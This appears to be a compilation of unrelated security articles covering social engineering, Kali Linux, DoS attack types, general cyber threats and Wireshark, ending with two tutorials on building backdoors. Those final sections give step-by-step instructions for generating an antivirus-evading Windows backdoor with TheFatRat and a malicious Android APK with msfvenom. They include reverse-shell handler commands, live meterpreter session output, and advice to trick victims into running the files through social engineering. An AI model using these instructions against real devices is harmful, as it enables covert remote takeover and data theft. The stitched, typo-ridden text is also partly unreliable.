Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to a computer system. The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software.
Knowing the tricks used by hackers to trick users into releasing vital login information among others is fundamental in protecting computer systems
In this tutorial, we will introduce you to the common social engineering techniques and how you can come up with security measures to counter them.
How social engineering Works?
HERE,
Gather Information: This is the first stage, the learns as much as he can about the intended victim. The information is gathered from company websites, other publications and sometimes by talking to the users of the target system.
Plan Attack: The attackers outline how he/she intends to execute the attack
Acquire Tools: These include computer programs that an attacker will use when launching the attack.
Attack: Exploit the weaknesses in the target system.
Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders, etc. is used in attacks such as password guessing.
Common Social Engineering Techniques:
Social engineering techniques can take many forms. The following is the list of the commonly used techniques.
Familiarity Exploit: Users are less suspicious of people they are familiar with. An attacker can familiarize him/herself with the users of the target system prior to the social engineering attack. The attacker may interact with users during meals, when users are smoking he may join, on social events, etc. This makes the attacker familiar to the users. Let’s suppose that the user works in a building that requires an access code or card to gain access; the attacker may follow the users as they enter such places. The users are most like to hold the door open for the attacker to go in as they are familiar with them. The attacker can also ask for answers to questions such as where you met your spouse, the name of your high school math teacher, etc. The users are most likely to reveal answers as they trust the familiar face. This information could be used to hack email accounts and other accounts that ask similar questions if one forgets their password.
Intimidating Circumstances: People tend to avoid people who intimidate others around them. Using this technique, the attacker may pretend to have a heated argument on the phone or with an accomplice in the scheme. The attacker may then ask users for information which would be used to compromise the security of the users’ system. The users are most likely give the correct answers just to avoid having a confrontation with the attacker. This technique can also be used to avoid been checked at a security check point.
Phishing: This technique uses trickery and deceit to obtain private data from users. The social engineer may try to impersonate a genuine website such as Yahoo and then ask the unsuspecting user to confirm their account name and password. This technique could also be used to get credit card information or any other valuable personal data.
Tailgating: This technique involves following users behind as they enter restricted areas. As a human courtesy, the user is most likely to let the social engineer inside the restricted area.
Exploiting human curiosity: Using this technique, the social engineer may deliberately drop a virus infected flash disk in an area where the users can easily pick it up. The user will most likely plug the flash disk into the computer. The flash disk may auto run the virus, or the user may be tempted to open a file with a name such as Employees Revaluation Report 2013.docx which may actually be an infected file.
Exploiting human greed: Using this technique, the social engineer may lure the user with promises of making a lot of money online by filling in a form and confirm their details using credit card details, etc.
Social Engineering Counter Measures
Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;
To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.
To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.
To counter phishing techniques, most sites such as Yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.
To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.
To counter human curiosity, it’s better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.
To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.
Kali Linux is a Security Distribution of Linux specifically designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack. BackTrack was their previous information security Operating System. The first iteration of Kali Linux was Kali 1.0.0 was introduced in March 2013. Offensive Security currently funds and supports Kalin Linux. If you were to visit Kali’s website today (www.kali.org), you would see a large banner stating, “Our Most Advanced Penetration Testing Distribution, Ever.” A very bold statement that ironically has yet to be disproven.
Kali Linux has over 600 preinstalled penetration-testing applications to discover. Each program with its unique flexibility and use case. Kali Linux does excellent job separating these useful utilities into the following categories:
In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. This effectively makes it impossible to stop the attack simply by blocking a single source.
A DoS or DDoS attack is analogous to a group of people crowding the entry door of a shop, making it hard for legitimate customers to enter, thus disrupting trade.
Criminal perpetrators of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gateways. Revenge, blackmail and can motivate these attacks.
Attack techniques
Attack tools
In cases such as MyDoom and Slowloris the tools are embedded in malware and launch their attacks without the knowledge of the system owner. Stacheldraht is a classic example of a DDoS tool. It uses a layered structure where the attacker uses a client program to connect to handlers which are compromised systems that issue commands to the zombie agents which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.
Application-layer attacks
Application-layer attacks employ DoS-causing exploits and can cause server-running software to fill the disk space or consume all available memory or CPU time. Attacks may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim’s disk space with logs. An attacker with shell-level access to a victim’s computer may slow it until it is unusable or crash it by using a fork bomb. Another kind of application-level DoS attack is XDoS (or XML DoS) which can be controlled by modern web application firewalls (WAFs).
Degradation-of-service attacks
Pulsing zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as degradation-of-service, can be more difficult to detect and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more overall disruption than a denial-of-service attack. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the server is really being attacked or is experincing higher than normal legitimate traffic loads.
Denial-of-service Level II
The goal of DoS L2 (possibly DDoS) attack is to cause a launching of a defense mechanism which blocks the network segment from which the attack originated. In case of distributed attack or IP header modification (that depends on the kind of security behavior) it will fully block the attacked network from the Internet, but without system crash.
Distributed DoS attack
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. Such an attack is often the result of multiple compromised systems (for example, a botnet) flooding the targeted system with traffic. A botnet is a network of zombie computers programmed to receive commands without the owners’ knowledge. When a server is overloaded with connections, new connections can no longer be accepted. The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines. This, after all, will end up completely crashing a website for periods of time.
DDoS extortion
In 2015, DDoS botnets such as DD4BC grew in prominence, taking aim at financial institutions. Cyber-extortionists typically begin with a low-level attack and a warning that a larger attack will be carried out if a ransom is not paid in Bitcoin. Security experts recommend targeted websites to not pay the ransom. The attackers tend to get into an extended extortion scheme once they recognize that the target is ready to pay.
HTTP slow POST DoS attack
First discovered in 2009, the HTTP slow POST attack sends a complete, legitimate HTTP POST header, which includes a ‘Content-Length’ field to specify the size of the message body to follow. However, the attacker then proceeds to send the actual message body at an extremely slow rate. Due to the entire message being correct and complete, the target server will attempt to obey the ‘Content-Length’ field in the header, and wait for the entire body of the message to be transmitted, which can take a very long time. The attacker establishes hundreds or even thousands of such connections until all resources for incoming connections on the server (the victim) are used up, hence making any further (including legitimate) connections impossible until all data has been sent. It is notable that unlike many other (D)DoS attacks, which try to subdue the server by overloading its network or CPU, an HTTP slow POST attack targets the logical resources of the victim, which means the victim would still have enough network bandwidth and processing power to operate. Further combined with the fact that will, by default, accept requests up to 2GB in size, this attack can be particularly powerful. HTTP slow POST attacks are difficult to differentiate from legitimate connections and are therefore able to bypass some protection systems. OWASP, an open source web application security project, released a tool to test the security of servers against this type of attacks.
Challenge Collapsar (CC) attack
A Challenge Collapsar (CC) attack is an attack that standard HTTP requests are sent to a targeted web server frequently, in which the Uniform Resource Identifiers (URIs) require complicated time-consuming algorithms or database operations, in order to exhaust the resources of the targeted web server.
In 2004, a Chinese hacker nicknamed KiKi invented a hacking tool to send these kinds of requests to attack a NSFOCUS firewall named “Collapsar”, and thus the hacking tool was known as “Challenge Collapsar”, or CC for short. Consequently, this type of attack got the name “CC attack”.
Internet Control Message Protocol (ICMP) flood
A smurf attack relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The attacker will send large numbers of IP packets with the source address faked to appear to be the address of the victim. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim’s computer will be flooded with traffic. This overloads the victim computer and can even make it unusable during such attack.
Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the “ping” command from Unix-like hosts (the -t flag on Windows systems is much less capable of overwhelming a target, also the -l (size) flag does not allow sent packet size greater than 65500 in Windows). It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.
Ping of death is based on sending the victim a malformed ping packet, which will lead to a system crash on a vulnerable system.
The BlackNurse attack is an example of an attack taking advantage of the required Destination Port Unreachable ICMP packets.
Nuke
A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop.[52]
A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim’s machine, causing it to lock up and display a Blue Screen of Death (BSOD).
Peer-to-peer attacks
Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a “puppet master,” instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim’s website instead.
Permanent denial-of-service attacks
Permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim’s hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device’s firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. This therefore “bricks” the device, rendering it unusable for its original purpose until it can be repaired or replaced.
The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet or a root/vserver in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacking communities. BrickerBot, a piece of malware that targeted IoT devices, used PDoS attacks to disable its targets.
PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard’s Systems Security Lab) used to detect and demonstrate PDoS vulnerabilities at the 2008 EUSecWest Applied Security Conference in London.
Reflected / spoofed attack
A distributed denial-of-service attack may involve sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet Protocol address spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. (This reflected attack form is sometimes called a “DRDOS”.)
ICMP Echo Request attacks (Smurf attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.
Mirai botnet
This attack works by using a worm to infect hundreds of thousands of IoT devices across the internet. The worm propagates through networks and systems taking control of poorly protected IoT devices such as thermostats, Wi-Fi enabled clocks and washing machines.W the device becomes enslaved usually the owner or user will have no immediate indication. The IoT device itself is not the direct target of the attack, it is used as a part of a larger attack. These newly enslaved devices are called slaves or bots. Once the hacker has acquired the desired number of bots, they instruct the bots to try to contact an ISP. In October 2016, a Mirai botnet attacked Dyn which is the ISP for sites such as Twitter, Netflix, etc. Assoon as this occurred, these websites were all unreachable for several hours. This type of attack is not physically damaging, but it will certainly be costly for any large internet companies that get attacked.
R-U-Dead-Yet? (RUDY)
RUDY attack targets web applications by starvation of available sessions on the web server. Much like Slowloris, RUDY keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.
SACK Panic
Manipulating maximum segment size and selective acknowledgement (SACK) it may be used by a remote peer to cause a denial of service by an integer overflow in the Linux kernel, causing even a Kernel panic. Jonathan Looney discovered CVE-2019-11477, CVE-2019-11478, CVE-2019-11479 on June 17, 2019.
Shrew attack
The shrew attack is a denial-of-service attack on the Transmission Control Protocol where the attacker employs man-in-the-middle techniques. It uses short synchronized bursts of traffic to disrupt TCP connections on the same link, by exploiting a weakness in TCP’s re-transmission timeout mechanism.[73]
Slow Read attack
A slow read attack sends legitimate application layer requests, but reads responses very slowly, thus trying to exhaust the server’s connection pool. It is achieved by advertising a very small number for the TCP Receive Window size, and at the same time emptying clients’ TCP receive buffer slowly, which causes a very low data flow rate.
A sophisticated low-bandwidth DDoS attack is a form of DoS that uses less traffic and increases their effectiveness by aiming at a weak point in the victim’s system design, i.e., the attacker sends traffic consisting of complicated requests to the system. Essentially, a sophisticated DDoS attack is lower in cost due to its use of less traffic, is smaller in size making it more difficult to identify, and it has the ability to hurt systems which are protected by flow control mechanisms.
(S)SYN flood
A SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets are handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet (Acknowledge), and waiting for a packet in response from the sender address (response to the ACK Packet). However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server can make, keeping it from responding to legitimate requests until after the attack ends.
Teardrop attacks
A teardrop attack involves sending mangled IP fragments with overlapping, oversized payloads to the target machine. This can crash various operating systems because of a bug in their TCP/IP fragmentation re-assembly code. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack.
(Although in September 2009, a vulnerability in Windows Vista was referred to as a “teardrop attack”, this targeted SMB2 which is a higher layer than the TCP packets that teardrop used).
One of the fields in an IP header is the “fragment offset” field, indicating the starting position, or offset, of the data contained in a fragmented packet relative to the data in the original packet. If the sum of the offset and size of one fragmented packet differs from that of the next fragmented packet, the packets overlap. When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets – resulting in a denial-of-service condition.
Telephony denial-of-service (TDoS)
Voice over IP has made abusive origination of large numbers of telephone voice calls inexpensive and readily automated while permitting call origins to be misrepresented through caller ID spoofing.
TTL expiry attack
It takes more router resources to drop a packet with a TTL value of 1 or less than it does to forward a packet with higher TTL value. When a packet is dropped due to TTL expiry, the router CPU must generate and send an ICMP time exceeded response. Generating many of these responses can overload the router’s CPU.
UPnP attack
This attack uses an existing vulnerability in Universal Plug and Play (UPnP) protocol to get around a considerable amount of the present defense methods and flood a target’s network and servers. The attack is based on a DNS amplification technique, but the attack mechanism is a UPnP router which forwards requests from one outer source to another disregarding UPnP behavior rules. Using the UPnP router returns the data on an unexpected UDP port from a bogus IP address, making it harder to take simple action to shut down the traffic flood. According to the Imperva researchers, the most effective way to stop this attack is for companies to lock down UPnP routers.
Cyber security is the practice of defending computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks. It’s also known as information technology security or electronic information security. The term applies in a variety of contexts, from business to mobile computing, and can be divided into a few common categories.
· Network security is the practice of securing a computer network from intruders, whether targeted attackers or opportunistic malware.
· Application security focuses on keeping software and devices free of threats. A compromised application could provide access to the data its designed to protect. Successful security begins in the design stage, well before a program or device is deployed.
· Information security protects the integrity and privacy of data, both in storage and in transit.
· Operational security includes the processes and decisions for handling and protecting data assets. The permissions users have when accessing a network and the procedures that determine how and where data may be stored or shared all fall under this umbrella.
· Disaster recovery and business continuity define how an organization responds to a cyber-security incident or any other event that causes the loss of operations or data. Disaster recovery policies dictate how the organization restores its operations and information to return to the same operating capacity as before the event. Business continuity is the plan the organization falls back on while trying to operate without certain resources.
· End-user education addresses the most unpredictable cyber-security factor: people. Anyone can accidentally introduce a virus to an otherwise secure system by failing to follow good security practices. Teaching users to delete suspicious email attachments, not plug in unidentified USB drives, and various other important lessons is vital for the security of any organization.
The scale of the cyber threat
The global cyber threat continues to evolve at a rapid pace, with a rising number of data breaches each year. A report by RiskBased Security revealed that a shocking 7.9 billion records have been exposed by data breaches in the first nine months of 2019 alone. This figure is more than double (112%) the number of records exposed in the same period in 2018.
Medical services, retailers and public entities experienced the most breaches, with malicious criminals responsible for most incidents. Some of these sectors are more appealing to cyber criminals because they collect financial and medical data, but all businesses that use networks can be targeted for customer data, corporate espionage, or customer attacks.
With the scale of the cyber threat set to continue to rise, the International Data Corporation predicts that worldwide spending on cyber-security solutions will reach a massive $133.7 billion by 2022. Governments across the globe have responded to the rising cyber threat with guidance to help organizations implement effective cyber-security practices.
In the U.S., the National Institute of Standards and Technology (NIST) has created a cyber-security framework. To combat the proliferation of malicious code and aid in early detection, the framework recommends continuous, real-time monitoring of all electronic resources.
The importance of system monitoring is echoed in the “10 steps to cyber security”, guidance provided by the U.K. government’s National Cyber Security Centre. In Australia, The Australian Cyber Security Centre (ACSC) regularly publishes guidance on how organizations can counter the latest cyber-security threats.
Types of cyber threats
The threats countered by cyber-security are three-fold:
1. Cybercrime includes single actors or groups targeting systems for financial gain or to cause disruption.
2. Cyber-attack often involves politically motivated information gathering.
3. Cyberterrorism is intended to undermine electronic systems to cause panic or fear.
So, how do malicious actors gain control of computer systems? Here are some common methods used to threaten cyber-security:
Malware
Malware means malicious software. One of the most common cyber threats, malware is software that a cybercriminal or hacker has created to disrupt or damage a legitimate user’s computer. Often spread via an unsolicited email attachment or legitimate-looking download, malware may be used by cybercriminals to make money or in politically motivated cyber-attacks.
There are a number of different types of malware, including:
· Virus: A self-replicating program that attaches itself to clean file and spreads throughout a computer system, infecting files with malicious code.
· Trojans: A type of malware that is disguised as legitimate software. Cybercriminals trick users into uploading Trojans onto their computer where they cause damage or collect data.
· Spyware: A program that secretly records what a user does, so that cybercriminals can make use of this information. For example, spyware could capture credit card details.
· Ransomware: Malware which locks down a user’s files and data, with the threat of erasing it unless a ransom is paid.
· Adware: Advertising software which can be used to spread malware.
· Botnets: Networks of malware infected computers which cybercriminals use to perform tasks online without the user’s permission.
SQL injection
An SQL (structured language query) injection is a type of cyber-attack used to take control of and steal data from a database. Cybercriminals exploit vulnerabilities in data-driven applications to insert malicious code into a databased via a malicious SQL statement. This gives them access to the sensitive information contained in the database.
Phishing
Phishing is when cyber criminals target victims with emails that appear to be from a legitimate company asking for sensitive information. Phishing attacks are often used to dupe people into handing over credit card data and other personal information.
Man-in-the-middle attack
A man-in-the-middle attack is a type of cyber threat where a cybercriminal intercepts communication between two individuals in order to steal data. For example, on an unsecure WiFi network, an attacker could intercept data being passed from the victim’s device and the network.
Denial-of-service attack
A denial-of-service attack is where cybercriminals prevent a computer system from fulfilling legitimate requests by overwhelming the networks and servers with traffic. This renders the system unusable, preventing an organization from carrying out vital functions.
Latest cyber threats
What are the latest cyber threats that individuals and organizations need to guard against? Here are some of the most recent cyber threats that the U.K., U.S., and Australian governments have reported on.
Dridex malware
In December 2019, the U.S. Department of Justice (DoJ) charged the leader of an organized cyber-criminal group for their part in a global Dridex malware attack. This malicious campaign affected the public, government, infrastructure and business worldwide.
Dridex is a financial trojan with a range of capabilities. Affecting victims since 2014, it infects computers though phishing emails or existing malware. Capable of stealing passwords, banking details and personal data which can be used in fraudulent transactions, it has caused massive financial losses amounting to hundreds of millions.
In response to the Dridex attacks, the U.K.’s National Cyber Security Centre advises the public to “ensure devices are patched, anti-virus is turned on and up to date and files are backed up”.
Romance scams
In February 2020, the FBI warned U.S. citizens to be aware of confidence fraud that cyber criminals commit using dating sites, chat rooms and apps. Perpetrators take advantage of people seeking new partners, duping victims into giving away personal data.
The FBI reports that romance cyber threats affected 114 victims in New Mexico in 2019, with financial losses amounting to $1.6 million.
Emotet malware
In late 2019, The Australian Cyber Security Centre warned national organizations about a widespread global cyber threat from Emotet malware.
Emotet is a sophisticated trojan that can steal data and also load other malware. Emotet thrives on unsophisticated password: a reminder of the importance of creating a secure password to guard against cyber threats.
End-user protection
End-user protection or endpoint security is a crucial aspect of cyber security. After all, it is often an individual (the end-user) who accidentally uploads malware or another form of cyber threat to their desktop, laptop or mobile device.
So, how do cyber-security measures protect end users and systems? First, cyber-security relies on cryptographic protocols to encrypt emails, files, and other critical data. This not only protects information in transit, but also guards against loss or theft.
In addition, end-user security software scans computers for pieces of malicious code, quarantines this code, and then removes it from the machine. Security programs can even detect and remove malicious code hidden in Master Boot Record (MBR) and are designed to encrypt or wipe data from computer’s hard drive.
Electronic security protocols also focus on real-time malware detection. Many use heuristic and behavioral analysis to monitor the behavior of a program and its code to defend against viruses or Trojans that change their shape with each execution (polymorphic and metamorphic malware). Security programs can confine potentially malicious programs to a virtual bubble separate from a user’s network to analyze their behavior and learn how to better detect new infections.
Security programs continue to evolve new defenses as cyber-security professionals identify new threats and new ways to combat them. To make the most of end-user security software, employees need to be educated about how to use it. Crucially, keeping it running and updating it frequently ensures that it can protect users against the latest cyber threats.
Cyber safety tips – protect yourself against cyberattacks
How can businesses and individuals guard against cyber threats? Here are our top cyber safety tips:
1. Update your software and operating system: This means you benefit from the latest security patches.
2. Use anti-virus software: Security solutions like Kaspersky Total Security will detect and removes threats. Keep your software updated for the best level of protection.
3. Use strong passwords: Ensure your passwords are not easily guessable.
4. Do not open email attachments from unknown senders: These could be infected with malware.
5. Do not click on links in emails from unknown senders or unfamiliar websites:This is a common way that malware is spread.
6. Avoid using unsecure WiFi networks in public places: Unsecure networks leave you vulnerable to man-in-the-middle attacks
Originally known as Ethereal, Wireshark displays data from hundreds of different protocols on all major network types. Data packets can be viewed in real-time or analyzed offline. Wireshark supports dozens of capture/trace file formats, including CAP and ERF. Integrated decryption tools display the encrypted packets for several common protocols, including WEP and WPA/WPA2.
How to Download and Install Wireshark
Wireshark can be downloaded at no cost from the Wireshark Foundation website for both macOS and Windows. You’ll see the latest stable release and the current developmental release. Unless you’re an advanced user, download the stable version.
During the Windows setup process, choose to install WinPcap or Npcap if prompted as these include libraries required for live data capture.null
You must be logged in to the device as an administrator to use Wireshark. In Windows 10, search for Wireshark and select Run as administrator. In macOS, right-click the app icon and select Get Info. In the Sharing & Permissions settings, give the admin Read & Write privileges.
The application is also available for Linux and other UNIX-like platforms including Red Hat, Solaris, and FreeBSD. The binaries required for these operating systems can be found toward the bottom of the Wireshark download page under the Third-Party Packages section. You can also download Wireshark’s source code from this page.
How to Capture Data Packets With Wireshark
When you launch Wireshark, a welcome screen lists the available network connections on your current device. Displayed to the right of each is an EKG-style line graph that represents live traffic on that network.
To begin capturing packets with Wireshark:
Select one or more of networks, go to the menu bar, then select Capture.To select multiple networks, hold the Shift key as you make your selection.
In the Wireshark Capture Interfaces window, select Start.There are other ways to initiate packet capturing. Select the shark fin on the left side of the Wireshark toolbar, press Ctrl+E, or double-click the network.
Select File > Save As or choose an Export option to record the capture.
To stop capturing, press Ctrl+E. Or, go to the Wireshark toolbar and select the red Stop button that’s located next to the shark fin.
How to View and Analyze Packet Contents
The captured data interface contains three main sections:null
The packet list pane (the top section)
The packet details pane (the middle section)
The packet bytes pane (the bottom section)
PACKET LIST
The packet list pane, located at the top of the window, shows all packets found in the active capture file. Each packet has its own row and corresponding number assigned to it, along with each of these data points:
No: This field indicates which packets are part of the same conversation. It remains blank until you select a packet.
Time: The timestamp of when the packet was captured is displayed in this column. The default format is the number of seconds or partial seconds since this specific capture file was first created.
Source: This column contains the address (IP or other) where the packet originated.
Destination: This column contains the address that the packet is being sent to.
Protocol: The packet’s protocol name, such as TCP, can be found in this column.
Length: The packet length, in bytes, is displayed in this column.
Info: Additional details about the packet are presented here. The contents of this column can vary greatly depending on packet contents.
To change the time format to something more useful (such as the actual time of day), select View > Time Display Format.
When a packet is selected in the top pane, you may notice one or more symbols appear in the No. column. Open or closed brackets and a straight horizontal line indicate whether a packet or group of packets are part of the same back-and-forth conversation on the network. A broken horizontal line signifies that a packet is not part of the conversation.
PACKET DETAILS
The details pane, found in the middle, presents the protocols and protocol fields of the selected packet in a collapsible format. In addition to expanding each selection, you can apply individual Wireshark filters based on specific details and follow streams of data based on protocol type by right-clicking the desired item.
PACKET BYTES
At the bottom is the packet bytes pane, which displays the raw data of the selected packet in a hexadecimal view. This hex dump contains 16 hexadecimal bytes and 16 ASCII bytes alongside the data offset.
Selecting a specific portion of this data automatically highlights its corresponding section in the packet details pane and vice versa. Any bytes that cannot be printed are represented by a period.
To display this data in bit format as opposed to hexadecimal, right-click anywhere within the pane and select as bits.
How to Use Wireshark Filters
Capture filters instruct Wireshark to only record packets that meet specified criteria. Filters can also be applied to a capture file that has been created so that only certain packets are shown. These are referred to as display filters.
Wireshark provides a large number of predefined filters by default. To use one of these existing filters, enter its name in the Apply a display filter entry field located below the Wireshark toolbar or in the Enter a capture filter field located in the center of the welcome screen.
For example, if you want to display TCP packets, type tcp. The Wireshark autocomplete feature shows suggested names as you begin typing, making it easier to find the correct moniker for the filter you’re seeking.
Another way to choose a filter is to select the bookmark on the left side of the entry field. Choose Manage Filter Expressions or Manage Display Filters to add, remove, or edit filters.
You can also access previously used filters by selecting the down arrow on the right side of the entry field to display a history drop-down list.
Capture filters are applied as soon as you begin recording network traffic. To apply a display filter, select the right arrow on the right side of the entry field.
Wireshark Color Rules
While Wireshark’s capture and display filters limit which packets are recorded or shown on the screen, its colorization function takes things a step further: It can distinguish between different packet types based on their individual hue. This quickly locates certain packets within a saved set by their row color in the packet list pane.
Wireshark comes with about 20 default coloring rules, each can be edited, disabled, or deleted. Select View > Coloring Rules for an overview of what each color means. You can also add your own color-based filters.
Select View > Colorize Packet List to toggle packet colorization on and off.
Statistics in Wireshark
Other useful metrics are available through the Statistics drop-down menu. These include size and timing information about the capture file, along with dozens of charts and graphs ranging in topic from packet conversation breakdowns to load distribution of HTTP requests.
Display filters can be applied to many of these statistics via their interfaces, and the results can be exported to common file formats, including CSV, XML, and TXT.
Using Metasploit is not an difficult thing anymore. Because there are many resources that are available over the internet. Which tells usage of metasploit. Metasploit are the common ways of attacking any outdated operating system. Still there are many operating system which can be exploit remotely. And there are many anti-viruses which cannot detect these exploits, say ethical hacking professionals. We are talking about TheFatRat.
According to ethical hacking researcher of International Institute of Cyber Security did a detailed analysis on the working of TheFatRat to check on the insides of pentesting tool.
TheFatRat is an another metasploit like tool which is used to generate backdoor easily. This tool is used to compile some of the malware with some popular payloads which then can be used to attack operating systems like Windows, MAC, Linux. This tool gives many options like creating backdoors, infected dlls, as per ethical hacking investigation..
The whole tool has been tested on Parrot OS. And after creating backdoors. These backdoors has been opened on Windows 10 Build 1607 and android.
If mono does not install type sudo apt-get update and sudo apt-get install mono-mcs or type sudo apt-get install mono-devel or type sudo apt-get install mono-complete
As some of the dependencies related to mono does no install directly. so simply run above commands.
In installation phase it will ask to create shortcut in parrot OS. Simply type y after installation you can run fatrat just like you run msfconsole.
After then type fatrat
As you can TheFatRat gives tons of options to create session in target windows or other platforms.
CREATING AN SIMPLE EXPLOIT TO HACK WINDOWS 10 :-
Type 6 will create fud backdoor using pwnwinds.
Then type 2 which will create fud backdoor using c# + powershell.
Enter LHOST listener/attacker IP address. Type 192.168.1.12
Type port 4444 or any port number.
Enter backdoor file name tstfile
Type 3 for using windows/meterpreter/reverse_tcp.
Press enter for creating backdoor.
After backdoor is creating it will save in /home/user/Downloads/TheFatRat/output/tstfile.exe
For accessing backdoor go to above location.
Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
Type msfconsole
After msfconsole has started type use exploit/multi/handler
Then type set payload windows/meterpreter/reverse_tcp
Type LHOST 192.168.1.12
Type LPORT 4444
Type exploit
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > exploit
Now for opening backdoor in Windows 10. Simply copy from here and paste to pendrive and open pendrive in Windows 10. You can also use any social engineering technique (like by Fake any website in seconds) to pass this exe to TARGET computer.
You have to copy two files tstfile.exe and program.cs. As this backdoor has created using C#
And then double click on tstfile.exe
As target click on the file a popup will came out and then meterpreter session will be opened.
As shown below meterpreter session has started in msfconsole.
msf5 exploit(multi/handler) > exploit [] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000 meterpreter > sysinfo Computer : DESKTOP-2304ULE OS : Windows 10 (Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
The above target is using Widnows 10. As session has created attacker can perform various tasks.
We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.
Step by step Tutorial
Generating a Payload with msfvenom
At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.
After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:
android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
LHOST is your local IP
LPORT is set to be as a listening port
R> /var/www/html would give the output directly on apache server
apk is the final name of the final output
This would take some time to generate an apk file of almost ten thousand bytes.
Launching an Attack
Before launching attack, we need to check the status of the apache server. Type command:
# service apache2 status
All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.
In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.
